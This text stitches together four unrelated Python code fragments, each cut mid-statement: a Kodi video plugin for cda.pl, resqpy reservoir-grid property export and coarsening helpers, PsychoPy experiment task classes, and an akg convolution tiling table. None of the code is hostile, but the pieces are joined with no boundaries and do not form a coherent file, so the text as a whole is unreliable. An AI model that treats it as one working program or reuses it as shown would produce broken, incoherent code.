TODO: someting with unused arguments "descr", "rating" if not service: service = 'cdapl' if not category: category = 'NONE' if not title: title = 'NONE' if not iconimage: iconimage = 'NONE' if not url: url = 'NONE' title = HTMLParser.HTMLParser().unescape(title) u = sys.argv[0] + "?service=" + service + "&name=" + name + "&category=" + category + \ "&title=" + title + "&url=" + urllib.quote_plus(url) + "&icon=" + \ urllib.quote_plus(iconimage) + "&strona=" + urllib.quote_plus(strona) # log.info(str(u)) if name == 'main-menu' or name == 'categories-menu': title = category if iconimage == '': iconimage = "DefaultVideo.png" liz = xbmcgui.ListItem(title, iconImage="DefaultFolder.png", thumbnailImage=iconimage) if isPlayable: liz.setProperty("IsPlayable", "true") liz.setInfo(type="Video", infoLabels={"Title": title}) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=u, listitem=liz, isFolder=folder) def LOAD_AND_PLAY_VIDEO(self, videoUrl, title, icon): ok = True mrknow_pCommon.mystat(videoUrl) log('moje url = %s' % videoUrl) if videoUrl == '': d = xbmcgui.Dialog() d.ok('Nie znaleziono streamingu.', 'Może to chwilowa awaria.', 'Spróbuj ponownie za jakiś czas') return False liz = xbmcgui.ListItem(title, iconImage=icon, thumbnailImage=icon) liz.setInfo(type="Video", infoLabels={"Title": title, }) try: xbmcPlayer = xbmc.Player() xbmcPlayer.play(videoUrl, liz) if not xbmc.Player().isPlaying(): xbmc.sleep(10000) # xbmcPlayer.play(url, liz) except: d = xbmcgui.Dialog() d.ok('Błąd przy przetwarzaniu.', 'Problem') return ok def handleService(self): params = self.parser.getParams() name = self.parser.getParam(params, "name") category = self.parser.getParam(params, "category") url = self.parser.getParam(params, "url") title = self.parser.getParam(params, "title") icon = self.parser.getParam(params, "icon") strona = self.parser.getParam(params, "strona") print ("Dane", url, name, category, title) #log.info("Dane: url:%s, name:%s, category:%s, title=%s" % (url, name, category, title)) if url is not None: log.info('[cda.pl] url:%s' % url) if name is None: self.listsMainMenu(MENU_TAB) elif name == 'main-menu' and category == '[COLOR yellow]PREMIUM[/COLOR]': self.listsMainMenu2(PREM) elif name == 'main-menu2': self.listsItems3(url) elif name == 'main-menu' and category == 'Najnowsze': self.listsItems2('http://www.cda.pl/video/p1') elif name == 'main-menu' and category == 'Video najpopularniejsze na FB': self.listsItems2('http://www.cda.pl/video/p1?o=popular&k=miesiac') elif name == 'main-menu' and category == 'Video najlepiej ocenione': self.listsItems2('http://www.cda.pl/video/p1?o=top&k=miesiac') elif name == 'main-menu' and category == 'Krótkie filmy i animacje': self.listsItems2('http://www.cda.pl/video/kat26/p1') elif name == 'main-menu' and category == 'Filmy Extremalne': self.listsItems2('http://www.cda.pl/video/kat24/p1') elif name == 'main-menu' and category == 'Motoryzacja, wypadki': self.listsItems2('http://www.cda.pl/video/kat27/p1') elif name == 'main-menu' and category == 'Muzyka': self.listsItems2('http://www.cda.pl/video/kat28/p1') elif name == 'main-menu' and category == 'Prosto z Polski': self.listsItems2('http://www.cda.pl/video/kat29/p1') elif name == 'main-menu' and category == 'Rozrywka': self.listsItems2('http://www.cda.pl/video/kat30/p1') elif name == 'main-menu' and category == 'Różności': self.listsItems2('http://www.cda.pl/video/kat33/p1') elif name == 'main-menu' and category == 'Sport': self.listsItems2('http://www.cda.pl/video/kat31/p1') elif name == 'main-menu' and category
True, a space is inserted between values; if False, a tab is used use_binary (boolean, optional, default False): if True, a pure binary copy of the array is written binary_only (boolean, optional, default False): if True, and if use_binary is True, then no ascii file is generated; if False (or if use_binary is False) then an ascii file is written nan_substitute_value (float, optional, default None): if a value is supplied, any not-a-number values are replaced with this value in the exported file (the cached property array remains unchanged); if None, then 'nan' or 'Nan' will appear in the ascii export file """ array_ref = self.cached_part_array_ref(part) assert (array_ref is not None) extent_kji = array_ref.shape assert (len(extent_kji) == 3) wd.write_array_to_ascii_file(file_name, extent_kji, array_ref, headers = headers, keyword = keyword, columns = columns, data_type = rqet.simplified_data_type(array_ref.dtype), decimals = decimals, target_simulator = 'nexus', blank_line_after_i_block = blank_line_after_i_block, blank_line_after_j_block = blank_line_after_j_block, space_separated = space_separated, append = append, use_binary = use_binary, binary_only = binary_only, nan_substitute_value = nan_substitute_value) def write_nexus_property_generating_filename( self, part, directory, use_title_for_keyword = False, headers = True, columns = 20, decimals = 3, # note: decimals only applicable to real numbers blank_line_after_i_block = True, blank_line_after_j_block = False, space_separated = False, # default is tab separated use_binary = False, binary_only = False, nan_substitute_value = None): """Writes the property array to a file using a filename generated from the citation title etc. arguments: part (string): the part name for which the array is to be exported directory (string): the path of the diractory into which the file will be written use_title_for_keyword (boolean, optional, default False): if True, the citation title for the property part is used as a keyword in the ascii export file for other arguments, see the docstring for the write_nexus_property() function note: the generated filename consists of: the citation title (with spaces replaced with underscores); the facet type and facet, if present; _t_ and the time_index, if the part has a time index _r_ and the realisation number, if the part has a realisation number """ title = self.citation_title_for_part(part).replace(' ', '_') if use_title_for_keyword: keyword = title else: keyword = None fname = title facet_type = self.facet_type_for_part(part) if facet_type is not None: fname += '_' + facet_type.replace(' ', '_') + '_' + self.facet_for_part(part).replace(' ', '_') time_index = self.time_index_for_part(part) if time_index is not None: fname += '_t_' + str(time_index) realisation = self.realization_for_part(part) if realisation is not None: fname += '_r_' + str(realisation) # could add .dat extension self.write_nexus_property(part, os.path.join(directory, fname), keyword = keyword, headers = headers, append = False, columns = columns, decimals = decimals, blank_line_after_i_block = blank_line_after_i_block, blank_line_after_j_block = blank_line_after_j_block, space_separated = space_separated, use_binary = use_binary, binary_only = binary_only, nan_substitute_value = nan_substitute_value) def write_nexus_collection(self, directory, use_title_for_keyword = False, headers = True, columns = 20, decimals = 3, blank_line_after_i_block = True, blank_line_after_j_block = False, space_separated = False, use_binary = False, binary_only = False, nan_substitute_value = None): """Writes a set of files, one for each part in the collection. arguments: directory (string): the path of the diractory into which the files will be written for other arguments, see the docstrings for the write_nexus_property_generating_filename() and write_nexus_property() functions note: the generated filenames are based on the citation titles etc., as for write_nexus_property_generating_filename() """ for part in self.dict.keys(): self.write_nexus_property_generating_filename(part, directory, use_title_for_keyword = use_title_for_keyword, headers = headers, columns = columns, decimals = decimals, blank_line_after_i_block = blank_line_after_i_block, blank_line_after_j_block = blank_line_after_j_block, space_separated = space_separated, use_binary = use_binary, binary_only = binary_only, nan_substitute_value = nan_substitute_value) def _array_box(collection, part, box = None, uncache_other_arrays = True): full_array = collection.cached_part_array_ref(part) if box is None: a = full_array.copy() else: a = full_array[box[0, 0]:box[1, 0] + 1, box[0, 1]:box[1, 1] + 1, box[0, 2]:box[1, 2] + 1].copy() full_array = None if uncache_other_arrays: collection.uncache_part_array(part) return a def _coarsening_sample(coarsening, a): # for now just take value from first cell in box # todo: find most common element in box a_coarsened = np.empty(tuple(coarsening.coarse_extent_kji), dtype = a.dtype) assert a.shape == tuple(coarsening.fine_extent_kji) # todo: try to figure out some numpy slice operations to avoid use of for loops for k in range(coarsening.coarse_extent_kji[0]): for j in range(coarsening.coarse_extent_kji[1]): for i in range(coarsening.coarse_extent_kji[2]): # local box within lgc space of fine cells, for 1 coarse cell cell_box = coarsening.fine_box_for_coarse((k, j, i)) a_coarsened[k, j, i] = a[tuple(cell_box[0])] return a_coarsened def _coarsening_sum(coarsening, a, axis = None): a_coarsened = np.empty(tuple(coarsening.coarse_extent_kji)) assert a.shape == tuple(coarsening.fine_extent_kji) # todo: try to figure out some numpy slice operations to avoid use of for loops for k in range(coarsening.coarse_extent_kji[0]): for j in range(coarsening.coarse_extent_kji[1]): for i in range(coarsening.coarse_extent_kji[2]): cell_box = coarsening.fine_box_for_coarse( (k, j, i)) # local box within lgc space of fine cells, for 1 coarse cell # yapf: disable a_coarsened[k, j, i] = np.nansum(a[cell_box[0, 0]:cell_box[1, 0] + 1, cell_box[0, 1]:cell_box[1, 1] + 1, cell_box[0, 2]:cell_box[1, 2] + 1]) # yapf: enable if axis is not None: axis_1 = (axis + 1) % 3 axis_2 = (axis + 2) % 3 # yapf: disable divisor = ((cell_box[1, axis_1] + 1 - cell_box[0, axis_1]) * (cell_box[1, axis_2] + 1 - cell_box[0, axis_2])) # yapf: enable a_coarsened[k, j, i] = a_coarsened[k, j, i] / float(divisor) return a_coarsened def _coarsening_weighted_mean(coarsening, a, fine_weight, coarse_weight = None, zero_weight_result = np.NaN): a_coarsened = np.empty(tuple(coarsening.coarse_extent_kji)) assert a.shape == tuple(coarsening.fine_extent_kji) assert fine_weight.shape == a.shape if coarse_weight is not None: assert coarse_weight.shape == a_coarsened.shape for k in range(coarsening.coarse_extent_kji[0]): for j in range(coarsening.coarse_extent_kji[1]): for i in range(coarsening.coarse_extent_kji[2]): _coarsening_weighted_mean_singlecell(a_coarsened, a, coarsening, k, j, i, fine_weight, coarse_weight, zero_weight_result) if coarse_weight is not None: mask = np.logical_or(np.isnan(coarse_weight), coarse_weight == 0.0) a_coarsened = np.where(mask, zero_weight_result, a_coarsened / coarse_weight) return a_coarsened def _coarsening_weighted_mean_singlecell(a_coarsened, a, coarsening, k, j, i, fine_weight, coarse_weight, zero_weight_result): cell_box = coarsening.fine_box_for_coarse((k, j, i)) # local box within lgc space of fine cells, for 1 coarse cell a_coarsened[k, j, i] = np.nansum( a[cell_box[0, 0]:cell_box[1, 0] + 1, cell_box[0, 1]:cell_box[1, 1] + 1, cell_box[0, 2]:cell_box[1, 2] + 1] * fine_weight[cell_box[0, 0]:cell_box[1, 0] + 1, cell_box[0, 1]:cell_box[1, 1] + 1, cell_box[0, 2]:cell_box[1, 2] + 1]) if coarse_weight is None: weight = np.nansum(fine_weight[cell_box[0, 0]:cell_box[1, 0] + 1, cell_box[0, 1]:cell_box[1, 1] + 1, cell_box[0, 2]:cell_box[1, 2] + 1]) if np.isnan(weight) or weight == 0.0: a_coarsened[k, j, i] = zero_weight_result else: a_coarsened[k, j, i] /= weight def _add_to_imported(collection, a, title, info, null_value = None, const_value = None): collection.add_cached_array_to_imported_list( a, title, info[10], # citation_title discrete = not info[4], indexable_element = 'cells', uom = info[15], time_index = info[12], null_value = null_value, property_kind = info[7], local_property_kind_uuid = info[17], facet_type = info[8], facet = info[9], realization = info[0], const_value = const_value, points = info[21]) def _extend_imported_initial_assertions(other, box, refinement, coarsening): import resqpy.grid as grr # at global level was causing issues due to circular references, ie. grid importing this module assert other.support is not None and isinstance(other.support, grr.Grid), 'other property collection has no grid support' assert refinement is None or coarsening is None, 'refinement and coarsening both specified simultaneously' if box is not None: assert bxu.valid_box(box, other.grid.extent_kji) if refinement is not None: assert tuple(bxu.extent_of_box(box)) == tuple(refinement.coarse_extent_kji) elif coarsening is not None: assert tuple(bxu.extent_of_box(box)) == tuple(coarsening.fine_extent_kji) # todo: any contraints on realization numbers ? def _extend_imported_with_coarsening(collection, other, box, coarsening, realization, copy_all_realizations, uncache_other_arrays): assert collection.support is not None and tuple(collection.support.extent_kji) == tuple( coarsening.coarse_extent_kji) source_rv, source_ntg, source_poro, source_sat, source_perm = _extend_imported_get_fine_collections( other, realization) fine_rv_array, coarse_rv_array = _extend_imported_coarsen_rock_volume(source_rv, other, box, collection, realization, uncache_other_arrays, coarsening, copy_all_realizations) fine_ntg_array, coarse_ntg_array = _extend_imported_coarsen_ntg(source_ntg, other, box, collection, realization, uncache_other_arrays, coarsening, copy_all_realizations, fine_rv_array, coarse_rv_array) fine_nrv_array, coarse_nrv_array = _extend_imported_nrv_arrays(fine_ntg_array, coarse_ntg_array, fine_rv_array, coarse_rv_array) fine_poro_array, coarse_poro_array = _extend_imported_coarsen_poro(source_poro, other, box, collection, realization, uncache_other_arrays, coarsening, copy_all_realizations, fine_nrv_array, coarse_nrv_array) _extend_imported_coarsen_sat(source_sat, other, box, collection, realization, uncache_other_arrays, coarsening, copy_all_realizations, fine_nrv_array, coarse_nrv_array, fine_poro_array, coarse_poro_array) _extend_imported_coarsen_perm(source_perm, other, box, collection, realization, uncache_other_arrays, coarsening, copy_all_realizations, fine_nrv_array, coarse_nrv_array) _extend_imported_coarsen_lengths(other, box, collection, realization, uncache_other_arrays, coarsening, copy_all_realizations) _extend_imported_coarsen_other(other, box, collection, realization, uncache_other_arrays, coarsening, copy_all_realizations, fine_rv_array, coarse_rv_array) def _extend_imported_get_fine_collections(other, realization): # look for properties by kind, process in order: rock volume, net to gross ratio, porosity, permeability, saturation source_rv = selective_version_of_collection(other, realization = realization, property_kind = 'rock volume') source_ntg = selective_version_of_collection(other, realization = realization, property_kind =
mov.draw() self.window.flip() def run(self): # loop over trials self.all_trial_response = [] # pre-allocate for self.trial in self.target_file.index: # get trial_info + stims self._get_trial_info() # get current time (self.t0) self.t0 = self.get_current_trial_time() # show the fixation for the duration of iti self.show_fixation(self.t0, self.start_time - self.t0) # collect real_start_time for each block (self.real_start_time) self.get_real_start_time(self.t0) # flush any keys in buffer event.clearEvents() # Start timer before display (get self.t2) self.get_time_before_disp() # display stims. The responses will be recorded and checked once the video is shown self._show_stim() if self.target_file['display_trial_feedback'][self.trial] and self.response_made: self.display_trial_feedback(correct_response = self.correct_response) else: self.screen.fixation_cross() # update response self.update_trial_response() # 5 show fixation for the duration of the iti ## 5.1 get current time t_start_iti = self.get_current_trial_time() self.show_fixation(t_start_iti, self.iti_dur) # 6. self.screen_quit() # get the response dataframe rDf = self.get_task_response(all_trial_response=self.all_trial_response) return rDf class SemanticPrediction(Task): # @property # def instruction_text(self): # return "Language Prediction Task\n\nYou will read a sentence and decide if the final word of the sentence makes sense\n\nIf the word makes sense, press 3\n\nIf the word does not make sense, press 4\n\nAnswer as quickly and as accurately as possible" def __init__(self, screen, target_file, run_end, task_name, study_name, target_num, ttl_flag, save = True): super(SemanticPrediction, self).__init__(screen, target_file, run_end, task_name, study_name, target_num, ttl_flag, save_response = save) self.feedback_type = 'rt' # reaction self.name = 'semantic_prediction' def _get_trial_info(self): # get trial info from the target file super().get_trial_info(self.trial) self.stem = self.target_file['stim'][self.trial] self.stem = self.stem.split() self.stem_word_dur = self.target_file['stem_word_dur'][self.trial] self.last_word = self.target_file['last_word'][self.trial] self.last_word_dur = self.target_file['last_word_dur'][self.trial] def _get_stims(self): # get stim (i.e. word) self.stem = self.target_file['stim'][self.trial] self.stem = self.stem.split() self.stem_word_dur = self.target_file['stem_word_dur'][self.trial] self.start_time = self.target_file['start_time'][self.trial] self.last_word = self.target_file['last_word'][self.trial] self.last_word_dur = self.target_file['last_word_dur'][self.trial] self.iti_dur = self.target_file['iti_dur'][self.trial] def _show_stem(self): # display stem words for fixed time for word in self.stem: self.word_start = self.get_current_trial_time() stim = visual.TextStim(self.window, text=word, pos=(0.0,0.0), color=(-1,-1,-1), units='deg') stim.draw() self.window.flip() # core.wait(self.stem_word_dur) # each word will remain on the screen for a certain amount of time (self.stem_word_dur) if self.ttl_flag: # wait for ttl pulse while ttl.clock.getTime()-self.word_start <= self.stem_word_dur: ttl.check() else: # do not wait for ttl pulse while self.clock.getTime()-self.word_start <= self.stem_word_dur: pass def _show_last_word(self): # display last word for fixed time self.word_start = self.get_current_trial_time() stim = visual.TextStim(self.window, text=self.last_word, pos=(0.0,0.0), color=(-1,-1,-1), units='deg') stim.draw() self.window.flip() def _show_stims_all(self): # show stem sentence self._show_stem() # display iti before final word presentation self.screen.fixation_cross() # core.wait(self.iti_dur) tc = self.get_current_trial_time() self.show_fixation(tc, self.iti_dur) # flush keys if any have been pressed event.clearEvents() # display last word for fixed time self._show_stim() self.window.flip() def run(self): # run the task # loop over trials self.all_trial_response = [] # pre-allocate for self.trial in self.target_file.index: # get stims self._get_trial_info() # get current time (self.t0) self.t0 = self.get_current_trial_time() # show the fixation for the duration of iti # wait here till the startTime self.show_fixation(self.t0, self.start_time - self.t0) # collect real_start_time for each block (self.real_start_time) self.get_real_start_time(self.t0) # 1. show stems self._show_stem() # 2. display fixation for the duration of the delay ## 2.1 get the current time t_stem_end = self.get_current_trial_time() ## 2.2 get the delay duration self.screen.fixation_cross() self.show_fixation(t_stem_end, self.iti_dur) # 3. display the last word and collect reponse ## 3.1 display prob self._show_last_word() ## 3.2 get the time before collecting responses (self.t2) self.get_time_before_disp() # 3.3collect response wait_time = self.target_file['trial_dur_correct'][self.trial] self.trial_response = self.check_trial_response(wait_time = wait_time, trial_index = self.trial, start_time = self.t0, start_time_rt = self.t2) # 3.4 update response self.update_trial_response() # 4. display trial feedback if self.target_file['display_trial_feedback'][self.trial] and self.response_made: self.display_trial_feedback(correct_response = self.correct_response) else: self.screen.fixation_cross() # 5 show fixation for the duration of the iti ## 5.1 get current time t_start_iti = self.get_current_trial_time() self.show_fixation(t_start_iti, self.iti_dur) # 6. self.screen_quit() # get the response dataframe rDf = self.get_task_response(all_trial_response=self.all_trial_response) return rDf class ActionObservation(Task): # @property # def instruction_text(self): # return "Action Observation Task\n\nYou have to decide whether the soccer player scores a goal\n\nYou will get feedback on every trial\n\nPress TRUE for goal\n\nPress FALSE for miss" def __init__(self, screen, target_file, run_end, task_name, study_name, target_num, ttl_flag, save = True): super(ActionObservation, self).__init__(screen, target_file, run_end, task_name, study_name, target_num, ttl_flag, save_response = save) self.feedback_type = 'acc' # reaction self.name = 'action_observation' def _get_trial_info(self): super().get_trial_info(self.trial) video_file = self.target_file['stim'][self.trial] # self.path_to_video = os.path.join(consts.stim_dir, self.study_name, self.task_name, "modified_clips", video_file) self.path_to_video = os.path.join(consts.stim_dir, self.study_name, self.task_name, "modified_clips", video_file) def _show_stim(self): mov = visual.MovieStim3(self.window, self.path_to_video, flipVert=False, flipHoriz=False, loop=False) # play movie self.trial_response_all = [] wait_time = self.trial_dur while mov.status != visual.FINISHED: if self.ttl_flag: while (ttl.clock.getTime() - self.t0 <= wait_time): ttl.check() # draw frame to screen mov.draw() self.window.flip() # get trial response self.trial_response = self.check_trial_response(wait_time = wait_time, trial_index = self.trial, start_time = self.t0, start_time_rt = self.t2) else: while (self.clock.getTime() - self.t0 <= wait_time): # draw frame to screen mov.draw() self.window.flip() # get trial response self.trial_response = self.check_trial_response(wait_time = wait_time, trial_index = self.trial, start_time = self.t0, start_time_rt = self.t2) # if self.ttl_flag: # while (ttl.clock.getTime() - self.t0 <= wait_time): # and not resp_made: # # play movie # while mov.status != visual.FINISHED: # ttl.check() # # draw frame to screen # mov.draw() # self.window.flip() # # get trial response # self.trial_response = self.check_trial_response(wait_time = wait_time, # trial_index = self.trial, # start_time = self.t0, # start_time_rt = self.t2) # else: # while (self.clock.getTime() - self.t0 <= wait_time): # and not resp_made: # # play movie # while mov.status != visual.FINISHED: # # draw frame to screen # mov.draw() # self.window.flip() # # get trial response # self.trial_response = self.check_trial_response(wait_time = wait_time, # trial_index = self.trial, # start_time = self.t0, # start_time_rt = self.t2) def run(self): # loop over trials self.all_trial_response = [] # pre-allocate for self.trial in self.target_file.index: # get trial info and stims self._get_trial_info() # get current time (self.t0) self.t0 = self.get_current_trial_time() # show the fixation for the duration of iti self.show_fixation(self.t0, self.start_time - self.t0) # collect real_start_time for each block (self.real_start_time) self.get_real_start_time(self.t0) # flush any keys in buffer event.clearEvents() # Start timer before display (get self.t2) self.get_time_before_disp() # display stims and get trial response self._show_stim() # show feedback or fixation cross if self.target_file['display_trial_feedback'][self.trial] and self.response_made: self.display_trial_feedback(correct_response = self.correct_response) else: self.screen.fixation_cross() # update response self.update_trial_response() # 5 show fixation for the duration of the iti ## 5.1 get current time t_start_iti = self.get_current_trial_time() self.show_fixation(t_start_iti, self.iti_dur) # 6. self.screen_quit() # get the response dataframe rDf = self.get_task_response(all_trial_response=self.all_trial_response) return rDf class TheoryOfMind(Task): # @property # def instruction_text(self): # return "Theory of Mind Task\n\nYou will read a story and decide if the answer to the question is True or False.\n\nIf the answer is True, press 3\n\nIf the answers is False, press 4\n\nAnswer as quickly and as accurately as possible" def __init__(self, screen, target_file, run_end, task_name, study_name, target_num, ttl_flag, save = True): super(TheoryOfMind, self).__init__(screen, target_file, run_end, task_name, study_name, target_num, ttl_flag, save_response = save) self.feedback_type = 'acc' # reaction self.name = 'theory_of_mind' def _get_trial_info(self): super().get_trial_info(self.trial) # get stim (i.e. story) self.story = self.target_file['story'][self.trial] self.story_dur = self.target_file['story_dur'][self.trial] self.question = self.target_file['question'][self.trial] self.question_dur = self.target_file['question_dur'][self.trial] def _get_stims(self): # get stim (i.e. story) self.story = self.target_file['story'][self.trial] self.story_dur = self.target_file['story_dur'][self.trial] self.question = self.target_file['question'][self.trial] self.question_dur = self.target_file['question_dur'][self.trial] self.iti_dur = self.target_file['iti_dur'][self.trial] self.trial_dur = self.target_file['trial_dur'][self.trial] self.start_time = self.target_file['start_time'][self.trial] def _show_story(self): # display story for fixed time self.story_start = self.get_current_trial_time() stim = visual.TextStim(self.window, text=self.story, alignHoriz='center', wrapWidth=20, pos=(0.0,0.0), color=(-1,-1,-1), units='deg') stim.text = stim.text # per PsychoPy documentation, this should reduce timing delays in displaying text stim.draw() self.window.flip() # the story will remain on the screen for a certain amount of time (self.story_dur) if self.ttl_flag: # wait for ttl pulse while ttl.clock.getTime()-self.story_start <= self.story_dur: ttl.check() else: # do not wait for ttl pulse while self.clock.getTime()-self.story_start <= self.story_dur: pass def _show_stim(self): # display question for fixed time stim = visual.TextStim(self.window, text=self.question, pos=(0.0,0.0), color=(-1,-1,-1), units='deg') stim.text = stim.text # per PsychoPy documentation, this should reduce timing delays in displaying text stim.draw() self.window.flip() def _show_stims_all(self): # show story self._show_story()
<reponame>KnowingNothing/akg-test #!/usr/bin/env python3 # coding: utf-8 # Copyright 2019 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """operator dsl function: conv_backprop_filter""" import akg.tvm import akg import akg.lang.cce from akg import dim from akg.utils import validation_check as vc_util from akg.utils import kernel_exec as utils conv_backprop_filter_tiling_args = { str(((6, 14, 14), (16, 6, 5, 5), (0, 0, 0, 0), (1, 1), (1, 1))): [16, 5, 5, 16, 1, 14, 14, 65536, 16, 65536], str(((1024, 14, 14), (2048, 1024, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [64, 1, 1, 64, 1, 14, 14, 16, 64, 16], str(((1024, 14, 14), (256, 1024, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 64, 1, 14, 14, 16, 16, 16], str(((1024, 14, 14), (512, 1024, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [128, 1, 1, 128, 1, 14, 14, 49, 32, 512], str(((128, 28, 28), (128, 128, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [128, 3, 3, 128, 1, 28, 28, 32, 112, 128], str(((128, 28, 28), (512, 128, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 256, 1, 28, 28, 128, 112, 32], str(((2048, 7, 7), (512, 2048, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [7, 1, 1, 512, 1, 7, 7, 49, 32, 512], str(((256, 14, 14), (1024, 256, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [128, 1, 1, 256, 1, 14, 14, 128, 16, 128], str(((256, 14, 14), (256, 256, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [128, 3, 3, 128, 1, 14, 14, 128, 16, 128], str(((256, 56, 56), (128, 256, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [128, 1, 1, 128, 1, 56, 56, 128, 112, 128], str(((256, 56, 56), (64, 256, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [16, 1, 1, 64, 1, 56, 56, 280, 16, 64], str(((3, 224, 224), (64, 3, 7, 7), (3, 3, 3, 3), (2, 2), (1, 1))): [16, 7, 7, 16, 1, 117, 224, 65536, 32, 65536], str(((16, 224, 224), (64, 16, 7, 7), (3, 3, 3, 3), (2, 2), (1, 1))): [16, 7, 7, 16, 1, 117, 224, 65536, 32, 65536], str(((512, 28, 28), (128, 512, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [14, 1, 1, 128, 1, 28, 28, 448, 16, 64], str(((512, 28, 28), (256, 512, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [128, 1, 1, 256, 1, 28, 28, 128, 16, 128], str(((512, 7, 7), (2048, 512, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [7, 1, 1, 128, 1, 7, 7, 49, 256, 128], str(((512, 7, 7), (512, 512, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [256, 3, 3, 256, 1, 7, 7, 128, 16, 64], str(((64, 56, 56), (256, 64, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [128, 1, 1, 64, 1, 56, 56, 64, 16, 128], str(((64, 56, 56), (64, 64, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 64, 1, 56, 56, 64, 16, 64], str(((64, 56, 56), (64, 64, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [64, 3, 3, 64, 1, 56, 56, 64, 16, 64], str(((256, 56, 56), (512, 256, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [64, 1, 1, 128, 1, 56, 56, 128, 16, 128], str(((512, 28, 28), (1024, 512, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [256, 1, 1, 512, 1, 28, 28, 256, 16, 128], } batch_conv_backprop_filter_tiling_args = { str(((32, 1024, 14, 14), (2048, 1024, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [16, 1, 1, 288, 1, 13, 13, 288, 80, 16], str(((32, 1024, 14, 14), (256, 1024, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [32, 1, 1, 256, 1, 14, 14, 256, 96, 32], str(((32, 1024, 14, 14), (512, 1024, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [32, 1, 1, 512, 1, 10, 14, 512, 16, 32], str(((32, 1024, 14, 14), (512, 1024, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [32, 1, 1, 416, 1, 13, 13, 416, 64, 32], str(((32, 128, 28, 28), (128, 128, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [16, 3, 3, 32, 1, 30, 30, 32, 64, 144], str(((32, 128, 28, 28), (512, 128, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 32, 1, 28, 28, 32, 304, 64], str(((32, 128, 56, 56), (128, 128, 3, 3), (0, 1, 0, 1), (2, 2), (1, 1))): [16, 3, 3, 32, 1, 19, 57, 32, 64, 144], str(((32, 16, 224, 224), (64, 16, 7, 7), (2, 3, 2, 3), (2, 2), (1, 1))): [16, 7, 7, 16, 1, 25, 229, 16, 16, 784], str(((32, 2048, 7, 7), (512, 2048, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 416, 1, 7, 7, 416, 32, 64], str(((32, 256, 14, 14), (1024, 256, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [256, 1, 1, 32, 1, 14, 14, 32, 32, 256], str(((32, 256, 14, 14), (256, 256, 3, 3), (1, 1, 1, 1), (1, 1), (1, 1))): [16, 3, 3, 128, 1, 16, 16, 128, 48, 144], str(((32, 256, 28, 28), (256, 256, 3, 3), (0, 1, 0, 1), (2, 2), (1, 1))): [16, 3, 3, 64, 1, 21, 29, 64, 176, 144], str(((32, 256, 56, 56), (128, 256, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [32, 1, 1, 32, 1, 20, 56, 32, 256, 32], str(((32, 256, 56, 56), (128, 256, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [16, 1, 1, 64, 1, 55, 55, 64, 96, 16], str(((32, 256, 56, 56), (512, 256, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [32, 1, 1, 64, 1, 55, 55, 64, 80, 32], str(((32, 256, 56, 56), (64, 256, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [32, 1, 1, 16, 1, 56, 56, 16, 1008, 32], str(((32, 3, 224, 224), (64, 3, 7, 7), (2, 3, 2, 3), (2, 2), (1, 1))): [16, 1, 7, 16, 1, 23, 229, 16, 272, 112], str(((32, 3, 224, 224), (64, 3, 7, 7), (3, 3, 3, 3), (2, 2), (1, 1))): [16, 7, 7, 16, 1, 56, 224, 448, 32, 64], str(((32, 3, 227, 227), (96, 3, 11, 11), (0, 0, 0, 0), (4, 4), (1, 1))): [16, 11, 11, 16, 1, 11, 227, 16, 16, 1936], str(((32, 512, 14, 14), (512, 512, 3, 3), (0, 1, 0, 1), (2, 2), (1, 1))): [16, 3, 3, 256, 1, 15, 15, 256, 128, 144], str(((32, 512, 28, 28), (1024, 512, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [16, 1, 1, 1024, 1, 19, 27, 1024, 16, 16], str(((32, 512, 28, 28), (128, 512, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [64, 1, 1, 32, 1, 22, 28, 32, 240, 64], str(((32, 512, 28, 28), (256, 512, 1, 1), (0, 0, 0, 0), (1, 1), (1, 1))): [128, 1, 1, 32, 1, 28, 28, 32, 256, 128], str(((32, 512, 28, 28), (256, 512, 1, 1), (0, 0, 0, 0), (2, 2), (1, 1))): [16, 1, 1, 256, 1,
